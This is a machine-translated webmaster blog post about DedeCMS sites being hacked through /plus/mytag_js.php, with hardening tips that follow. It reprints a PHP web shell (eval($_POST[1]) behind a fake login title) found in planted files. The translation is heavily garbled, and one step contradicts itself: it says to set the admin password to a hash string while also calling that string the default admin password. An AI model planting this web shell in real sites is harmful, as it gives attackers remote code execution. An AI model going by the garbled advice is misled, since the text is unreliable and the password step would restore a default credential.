Talking about some hidden troubles in dedecms and how to prevent the risk

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

Dedecms has been a very hot building station CMS, mainly benefited from the two major webmaster network of the full support; However, people fire is many, CMS too fire also will be ulterior motives of the people stare. My site has been using DEDECMS, a period of time before another attack, the purpose of the attack is very simple, then is the black chain, know that after slightly modified code to recover, is not very serious; this time the site is also inexplicably uploaded files, similar to the previous time, although the other party has not been able to modify the site template, However, this means that the site security is not in place, the other side at any time may obtain administrator privileges, so pay special attention to the site's security precautions.

Because I like the inquisitive, so I went to the internet to find the relevant information, found that this is indeed a dedecms loophole, hackers can use multidimensional variables to bypass regular detection, the main loophole occurred in/plus/mytag_ In js.php, the principle is to prepare a MySQL database to attack the database of known sites, by writing a sentence to the database code, as long as the successful write, then you can use the code to obtain background administrator permissions.

Combined with my site being attacked has been similar to the experience of others, hackers write files mainly exist in the/plus/folder, currently known several documents including ga.php, log.php, b.php, B1.php and so on, the characteristics of the file is short, little content, may be written when not very convenient, but the role of these codes is really not small.

Here's some of the code in the ga.php file:

<title>login</title>no<?php
Eval ($_post[1])
?>
<title>login</title>no<?php
Eval ($_post[1])
?>
<title>login</title>no<?php
Eval ($_post[1])
?>

The actual code is longer than the above interception, but it's all the repetition of the code, As for log.php code, similar to this, only a word, simple and clear, if you have a little understanding of network security, then you will know that PHP is a Trojan horse, the use of some of the specified tools can execute this code, is expected to crack the password function.

Now that you know what vulnerabilities the other person is using and what principles they use to exploit them, how do you prevent these dangerous things from happening? After querying a large amount of information, I initially sorted out the following steps to prevent the use of loopholes, I hope the same applies to dedecms webmaster friends help.

First, upgrade the version of the patch set directory permissions

This is an official solution to this, no matter what version of the dedecms you are using, it is necessary to update the patch in the background in time, which is the most important step to avoid the exploit; At the same time, the authorities also provide a way to set up the directory, mainly to set up data, templets, uploads, A is a read-write not executable permission, include, member, plus, admin directory, etc. set to perform read-only writable permissions; Delete install and special directories, how to set up the official instructions.

Ii. Modify Admin account and password

Hackers may be using the default Admin account, and then speculated that the password to crack, so modify the default admin account is very important, as to how to modify, many methods, more effective is to use Phpadmin landing site database, find dede_admin database table (Dede is a database table prefix ), modify the UserID and PWD two, where the password must be modified into a f297a57a5a743894a0e4, which is the default password admin;

Third, other noteworthy places

As for more details, also pay attention to, try not to choose too cheap space, too cheap space is very easy to appear in the server itself security problems, as long as the server problems, the entire server below the site is hopeless. There is, if not necessary, as far as possible do not open membership registration What, use is very troublesome, as for the site background directory, do not write to the robots.txt inside, at the same time every month at least change, the administrator password or something to be replaced, to avoid the same as other account passwords are speculated out.

After several instances of the Web site being attacked, have to say, the internet is not a safe to sleep on the net, as a webmaster, is a network of people, should pay attention to network security, as long as the requirements to do these precautions, do not say 100%, at least 95% of the likely will not be successfully obtained background permissions. This article by the Love Not Net (http://www.aibue.com) original, reprint cooperation please specify!